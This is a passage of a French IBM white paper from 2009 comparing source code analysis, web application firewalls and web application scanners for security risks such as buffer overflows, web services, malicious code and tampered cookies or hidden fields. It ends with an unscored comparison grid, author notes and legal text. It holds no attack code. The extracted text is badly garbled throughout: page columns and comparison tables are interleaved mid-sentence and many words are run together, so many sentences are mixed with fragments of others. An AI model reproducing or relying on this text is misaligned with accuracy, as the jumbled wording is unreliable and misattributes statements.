Lesautorisé, sans l’autorisation de couche métier appropriée. contrôles outils d’analyse d’autorisation d’application Web etPour identifier correctement ce risque, la meilleure solution appropriés sont en l’analyse manuelle place sans inspection utilisés avec l’analyseest une combinaison d’analyse de code source, d’analyse manuelle. L’analyse de code sourced’application Web et d’ethical hacking manuel. Les outils de code source peut assurent la meilleured’analyse d’application Web n’ont pas une visibilité suffisante aussi identifier les API couverture.de la structure de l’application Web au niveau source pour qui sont associées aux fonctionstrouver et analyser des pages Web non liées, tandis que d’authentification etl’analyse de code source n’a pas une visibilité suffisante d’autorisation dedes processus métier pour déterminer si des contrôles l’entreprise, ce qui fournit à l’analysted’authentification ou d’autorisation sont requis. Dans des pistescertains cas, les contrôles d’authentification sont contrôlés d’investigationpar l’application ou par le serveur Web et directement par supplémentaires.n’importe quel code d’application. Les approches qui utilisentl’ethical hacking manuel sont souvent très fiables elles aussi.Par exemple, un analyste de sécurité peut étudier tous les B1 – Configuration du moteur d’exécution de l’applicationpoints d’entrée d’URL web.xml, puis tenter de forcer la Une mauvaise configuration de l’environnement du moteurnavigation jusqu’à ces points d’entrée en tant qu’utilisateur d’exécution peut exposer les applications Web à de gravesnon autorisé. risques. Ces menaces sont issues d’utilisateurs internes et externes mal intentionnés. De nombreux risques peuvent exposer les vulnérabilités d’accès à un serveur d’application.
  • 13. IBM Software 13Par exemple, si l’application est servie par un environnement B2 – Dépassements de la mémoire tamponde serveur d’application co-hébergé, les vulnérabilités d’une Le dépassement de mémoire tampon n’est pas considéréapplication peuvent contaminer une autre application, ou comme un vecteur d’attaque valide pour les applications Webpeut-être une plateforme d’application hébergée elle-même actuelles écrites en langages interprétés comme Java et lavulnérable. Par conséquent, il faut toujours être vigilant en ce famille de langages .NET de Microsoft. Toutefois, dequi concerne les données de configuration qui ne sont pas nombreuses applications d’entreprise existantes interagissent àprotégées correctement. un certain niveau avec de nombreux systèmes hérités écrits en C et en C++, et il leur manque par conséquent la gestion deLa meilleure approche est une combinaison d’analyse statique mémoire intégrée nécessaire pour empêcher les dépassementspour identifier le problème de configuration spécifique à de mémoire tampon. Les données non validées provenant del’application, un outil d’analyse d’application Web pour ces applications Web envoyées aux systèmes hérités exposentdéterminer le problème de configuration de l’environnement les applications héritées à un risque de dépassement de ladu serveur d’application et l’ethical hacking manuel. mémoire tampon. Il est absolument essentiel que la stratégie de détection et de prévention prenne en charge les environnements de développement nouveau et hérité. Analyse de code Pare-feu Outil d’analyse source d’application Web d’application Web Le dépassement de mémoire tampon est similaire à n’importe quel autre type d’attaques par injection. Un utilisateur L’analyse de code Les pare-feu Les outils d’analyse malicieux insère du code informatique exécuté dans source peut être d’application Web d’application Web l’environnement de l’application. Le système exécute alors desutilisée pour analyser peut assurer un constituent un très des fichiers de certain niveau de bon moyen de actions à la demande du pirate, mais avec les privilèges duconfiguration afin de protection contre détection prêt à système lui-même. rechercher des certaines attaques l’emploi pour les paramètres non spécifiques au serveurs d’application sécurisés, mais serveur d’application, mal configurés et de Avec une manipulation adaptée des entrées de l’application certains paramètres mais ils n’ont pas une nombreux outils et la création de règles pour contrôler la plage appropriéesont contrôlés par la visibilité des d’analyse dans tous les champs d’entrée Web, les outils d’analyse manière dont le configurations comprennent desserveur d’application incorrectes des signatures d’application Web et les pare-feu d’application Webest configuré et non applications suffisante spécifiques basées fournissent un certain degré de protection. Cependant, par des fichiers de pour être vraiment sur la version comme de nombreux systèmes hérités interagissent aussi configuration efficaces. découverte du bien avec des interfaces Web que non Web, ces systèmes à eux d’application serveur d’application spécifiques. Il est et de la plateforme. seuls ne suffisent pas à protéger ni à détecter tous les risquespréférable d’effectuer Cependant, les outils de vulnérabilité au dépassement de la mémoire tampon. les tests en utilisant d’analyse L’analyse de code source offre la détection la plus complète et une combinaison d’application Web d’analyse de code comme les pare-feu la meilleure protection contre ce genre d’attaque. source, d’ethical d’application Web hacking manuel et n’ont pas de visibilité une boîte noire. des paramètres de configuration spécifiques à l’application. Une combinaison d’analyse de code source et d’analyse d’application Web offre la meilleure stratégie défensive.
  • 14. 14 Choisir le bon outil pour faire du bon travail Analyse de code Pare-feu Outil d’analyse de personnalisation pour fournir un certain niveau de source d’application Web d’application Web protection. L’analyse de code source peut être utilisée pour traiter tous les points d’entrée liés aux services Web sous forme de données contrôlables par l’utilisateur et pour réaliser L’analyse de code Avec des règles Les outils d’analyse source offre la personnalisées, les d’application Web le même type d’analyse que celui utilisé pour détecter tous les meilleure protection pare-feu d’application peuvent manipuler de autres types de risques d’injection de données. Cependant, cela pour analyser les Web peuvent manière implique l’ajout de règles personnalisées pour spécifier les applications héritées effectuer certains personnalisée les nouveaux vecteurs d’entrée au moteur d’analyse. écrites en C ou en contrôles de plage entrées Web pourC++ qui peuvent être sur les champs identifier les endroits vulnérables aux d’entrée pour qui provoquent une Une combinaison d’analyse de code source et un pare-feu attaques de type s’assurer qu’un défaillance de d’application Web qui prend en charge les services Web dépassement de la utilisateur ne fournit l’application. mémoire tampon. pas trop de données, Toutefois, ce type de constitue la meilleure approche pour atténuer ce risque. Le L’analyse de code ce qui pourrait manipulation produit soutien apporté par les outils d’analyse d’application Web est source découvre les entraîner un un pourcentage très minime et ne fournit aucun avantage significatif par rapport àvecteurs d’entrée des dépassement de la élevé de réponses applications Web qui mémoire tampon. faussement positives l’analyse de code source. fournissent des Cependant, comme et faussement données aux les pare-feu négatives car lainterfaces héritées de d’application Web visibilité dans le Analyse de code Pare-feu Outil d’analyse manière non manquent de visibilité système sous-jacent source d’application Web* d’application Web sécurisée. Cela en ce qui concerne est insuffisante pour permet à l’analyste les systèmes dorsaux déterminer où, ou si,de sécurité de trouver exposés, ce niveau le dépassement de la L’analyse de code La prise en charge Les outils d’analyse les vecteurs de de protection est mémoire tampon est source avec une des protocoles de d’application Web dépassement de la insuffisant dans la un risque réel. création de règles messagerie SOAP et jouent un rôle limité mémoire tampon à plupart des cas. appropriées fournit XML peut offrir une dans l’analyse des partir d’une surface les informations les protection services Web et la d’attaque plus large. plus détaillées sur la raisonnable avec une plupart d’entre eux manière dont les personnalisation des nécessitent de données contrôlables règles adaptée. La nombreux efforts par l’utilisateur gérées combinaison manuels pourB3 – Services Web par l’application sont d’analyse de code apporter une valeurComme de plus en plus d’organisations optent pour une utilisées, source constitue supplémentaire pararchitecture orientée services (SOA), les services Web potentiellement à des actuellement la rapport à l’analyse de fins malicieuses. meilleure stratégie de code source. Le seulconstituent une technologie prédominante. Ils présentent un L’application est ainsi protection pour les avantage lié ànouveau vecteur d’entrée vers une application et les attaques ouverte aux attaques. applications de l’utilisation d’un outilvisant les applications de service Web sont en augmentation. service Web. d’analyseCela représente un défi unique pour l’outil d’analyse d’application Web par rapport à un outild’application Web car il est quasiment impossible de d’analyse de codedécouvrir et de tester automatiquement les vulnérabilités liées source est obtenuaux services Web à l’aide des algorithmes de découverte en lorsque le service Web est écrit dansétoile existants utilisés par presque tous les outils d’analyse un langage qui n’estd’application Web. Certains pare-feu d’application Web pas pris en chargeprennent en charge l’inspection des flux de message SOAP et par l’outil d’analyse de code source.XML, mais la plupart d’entre eux nécessitent un niveau élevé
  • 15. IBM Software 15B4 – Code malicieux cela ne représente pas tous les types de code malicieux,Il existe deux principaux types de code malicieux dans les l’analyste de sécurité obtient ainsi un plan correct deapplications actuelles : l’application qui peut l’orienter vers les endroits utilisés, volontairement ou non, à des fins malicieuse.● Du code mort, masqué ou code de débogage resté dans une application de production et utilisé à des fins malicieuses Analyse de code Pare-feu Outil d’analyse source d’application Web d’application Web● Du code inséré intentionnellement qui permet d’obtenir un accès illégal ou qui déclenche des événements ayant des résultats malicieux. Lorsque le code Les pare-feu Les outils d’analyse source est disponible, d’application Web ont d’application Web ont l’analyse de code du mal à obtenir des du mal à obtenir desLa seule manière raisonnable d’identifier du code malicieux source est la manière informations sur le informations sur leest d’analyse le code source. Les outils d’analyse d’application la plus efficace déclenchement du déclenchement duWeb et les pare-feu d’application Web ne sont pas efficaces d’analyser une code malicieux code malicieux application pour potentiel et ils ont du potentiel et ils ont dupour rechercher le code malicieux ni pour protéger identifier les risques mal à déterminer si le mal à déterminer si lel’application contre le code malicieux. Souvent, le code exploités par le code comportement comportementmalicieux ressemble exactement au code normal. Il est possible malicieux. exécuté est de nature exécuté est de nature malicieuse ou non. malicieuse ou non.d’identifier le code malicieux en étudiant les points d’accès àl’application existants. L’analyse de code source est un outilextrêmement efficace pour identifier tous les endroits où les B5 – Cookies personnalisés et champs masquésdonnées sortent du système. Pour que le code puisse être L’utilisation de cookies et de champs masqués reste courantemalicieux, il a besoin d’un point d’accès. Un utilisateur accède dans presque toutes les grandes applications d’entrepriseau système par le déclenchement d’un événement, en laissant actuelles. Si vous avez essayé de désactiver les cookies etdes mots de passe figés dans le code ou en convertissant des d’utiliser le Web, vous savez que l’utilisation des cookiescanaux de communication. Comprendre les points d’accès est n’est pas près de disparaître. Un utilisateur malicieux peutessentiel pour aider l’analyste de sécurité à identifier le code facilement manipuler ces données car les cookies sontmalicieux. enregistrés sur l’ordinateur du client. Cette falsification peut entraîner tous types de problèmes de sécurité. Les champsEn étudiant tous les endroits où le système de fichiers, le masqués sont également utilisés pour stocker des informationsréseau, les déclencheurs programmés et les informations d’état ou de contrôle et eux aussi peuvent être facilementd’authentification figées dans le code sont stockés et utilisés, falsifiés. Les cookies et les champs masqués ne doivent jamaison trouve souvent des endroits vulnérables. Il peut s’agir de être considérés comme des magasins de données sûrs et sanssites où un accès inapproprié au système de fichiers est risque. Un utilisateur malicieux parcourt la charge depermis, où des points d’entrée et de sortie de communication réponse HTTP (HyperText Transport Protocol) sous-jacentenon conformes aux exigences spécifiques de l’application d’une manière ou d’une autre (en visualisant la page source ouexistent ou des endroits où les informations d’authentification en utilisant un proxy) pour déterminer quels champs masquéssont figées dans le code et facilement identifiables. Même si et quels cookies sont utilisés pour comprendre comment votre
  • 16. 16 Choisir le bon outil pour faire du bon travailapplication fonctionne. L’utilisateur malicieux utiliser un Résuméproxy HTTP ou envoie des requêtes manuelles à votre La sécurité des applications est un élément critique desapplication avec des valeurs modifiées pour voir l’hypothèse pratiques de sécurité générales de toute organisation. L’accèsque forme votre application et comment briser ces hypothèses. aux ressources critiques des entreprises est de plus en plusCela entraîne des problèmes de sécurité. souvent contrôlé par des logiciels. Il n’y a donc rien de surprenant dans le fait que les politiques de sécurité physiqueLa détection et la prévention associées aux champs masqués et et de sécurité du réseau existantes, les procédures et lesaux cookies font partie des rares domaines dans lesquels une produits ne suffisent pas à satisfaire les besoins des entreprisescombinaison de tous les outils offre la meilleure défense en matière de sécurité. Il n’existe pas de solution idéale enet la meilleure détection. Analyser à la fois le code source et matière de sécurité des applications et chacun des outilsl’application complète permet d’obtenir la meilleure étudiés a sa place dans un programme de sécurité d’applicationcouverture de détection. Un pare-feu d’application Web offre générale. Le problème consiste à choisir le bon outil. Étantla meilleure défense contre toute manipulation effectuée par le donné l’étendue des problèmes que l’on trouve dans lesclient. applications, des outils d’analyse seuls peuvent être insuffisants. Cependant, l’analyse susmentionnée montre clairement que l’analyse de code source doit être la méthode Analyse de code Pare-feu Outil d’analyse source d’application Web d’application Web fondamentale pour identifier le plus vaste éventail de vulnérabilités critiques dans un logiciel donné. Les outils d’analyse d’application Web sont un excellent outil pour L’analyse de code Les pare-feu Les outils d’analyse effectuer une vérification finale avant le déploiement. Lessource peut surveiller d’application Web d’application Web tous les endroits où peuvent empêcher la peuvent détecter tous pare-feu d’application Web sont un atout exceptionnel des cookies sont falsification des les types de lorsqu’ils sont utilisés pour gagner du temps en apportant uncréés et utilisés. Elle données par le biais vulnérabilité certain niveau de protection en attendant que l’applicationtraite l’utilisation des des champs mentionnés champs masqués masqués et des précédemment qui sous-jacente puisse être corrigée. Toutefois, un pare-feu comme tout autre cookies soit à l’aide découlent d’un usage d’application Web seul ne suffit à protéger convenablement type d’entrée du chiffrement incorrect ou de la tous les points vulnérables exposés dans une application Web. contrôlée par (comme le modification par Une approche équilibrée de la sécurité des applications offre le l’utilisateur. chiffrement et le l’utilisateur des déchiffrement des cookies et des plus d’avantages. Chaque organisation doit trouver un cookies) soit en champs masqués. équilibre entre les exigences souvent conflictuelles associées ajoutant des règles aux menaces, à l’exposition et au budget pour obtenir la personnalisées pour détecter les valeurs combinaison qui lui convient le mieux, afin de déterminer la illégales pour cet stratégie de gestion de la sécurité d’application basée sur les ensemble d’entrées. risques la plus efficace possible.
  • 17. IBM Software 17Annexe A : Outils de sécurité d’application – Le carnet de notes Excellent Bon Moyen Aucun Vulnérabilité Analyse de Pare-feu Outil danalyse code source dapplication Web dapplication Web A1 – Scriptage inter-sites A2.1 – Injection de code SQL standard A2.2 – Injection de code XML A2.3 – Injection LDAP (Lightweight Directory Access Protocol) A2.4 – Injections de commandes A2.5 – Injection de code AJAX A3 – Exécution de fichiers malicieuxs A4 – Référence dobjet direct non sécurisée A5 – Contrefaçon de requête inter-site A6 – Fuite dinformations et mauvaise gestion des erreurs A7 – Authentification interrompue et gestion de session A8 – Stockage cryptographique non sécurisé A9 – Communications non sécurisées A10 – Échec de restriction daccès URL B1 – Configuration du moteur dexécution de lapplication B2 – Dépassements de la mémoire tampon/code natif B3 – Services Web B4 – Code malicieux B5 – Cookies personnalisés et champs masqués Note moyenne
  • 18. Notes
  • 19. Notes
  • 20. Pour en savoir plusPour en savoir plus sur IBM Rational AppScan SourceEdition, contactez votre représentant commercial IBM, votrepartenaire commercial IBM ou rendez-vous à l’adresse :ibm.com/software/rational/products/appscan/source/ IBM France 17, avenue de l’EuropeÀ propos des auteurs 92275 Bois-Colombes CedexRyan Berg est Senior Security Architect chez IBM. Ryan estun orateur, un formateur et un auteur populaire dans les La page d’accueil d’IBM se trouve à l’adresse ibm.comdomaines de la sécurité, de la gestion des risques et des IBM, le logo IBM, ibm.com, AppScan et Rational sont des marques ouprocessus de développement sécurisés. Il détient des brevets et marques déposées d’International Business Machines Corporation auxdes brevets en instance dans les secteurs de l’évaluation de la États-Unis et/ou dans d’autres pays. Si ces marques et les autres termessécurité multilingue, de la sécurité au niveau du noyau, du déposés d’IBM comportent, sur le première occurrence dans ce document, un symbole de marque de commerce (® ou ™), ces symboles indiquent deslangage d’évaluation de sécurité intermédiaire et des marques de commerce enregistrées aux États-Unis ou de common lawprotocoles de communication à distance sécurisés appartenant à IBM au moment de la publication de ce document. Ces marques de commerce peuvent être enregistrées ou de common law dans d’autres pays. Une liste à jour des marques d’IBM est disponible sur Internet, sous la rubrique «Copyright and trademark information» (Informations sur les droits d’auteur et les marques), sur le site ibm.com/legal/copytrade.shtml Java ainsi que tous les logos et toutes les marques mentionnant Java sont des marques de Sun Microsystems, Inc. aux États-Unis et/ou dans d’autres pays. Microsoft est une marque de Microsoft Corporation aux États-Unis et/ou dans d’autres pays. D’autres noms d’entreprises, de produits et de services peuvent être des marques ou des marques de service appartenant à d’autres sociétés. Le présent document peut contenir des informations ou des références concernant certains produits, logiciels ou services IBM non annoncés dans ce pays. Cela ne signifie pas qu’IBM ait l’intention de les y annoncer. Toute référence à un produit logiciel ou service IBM n’implique pas que seul ce produit, logiciel ou service puisse être utilisé. Tout élément fonctionnellement équivalent peut être utilisé s’il n’enfreint aucun droit d’IBM. Le présent document est publié uniquement à titre indicatif. Les informations qu’il contient sont soumises à modification sans préavis. Veuillez prendre contact avec votre revendeur IBM local pour obtenir les dernières informations sur les produits et les services IBM. IBM ne donne aucun avis juridique, comptable ou d’audit financier et ne garantit pas que ses produits ou services sont conformes aux lois applicables. Les utilisateurs sont seuls responsables du respect des lois et réglementations de sécurité en vigueur, en particulier les lois et réglementations nationales. © Copyright IBM Corporation 2009 Tous droits réservés. RAW14201-FRFR-00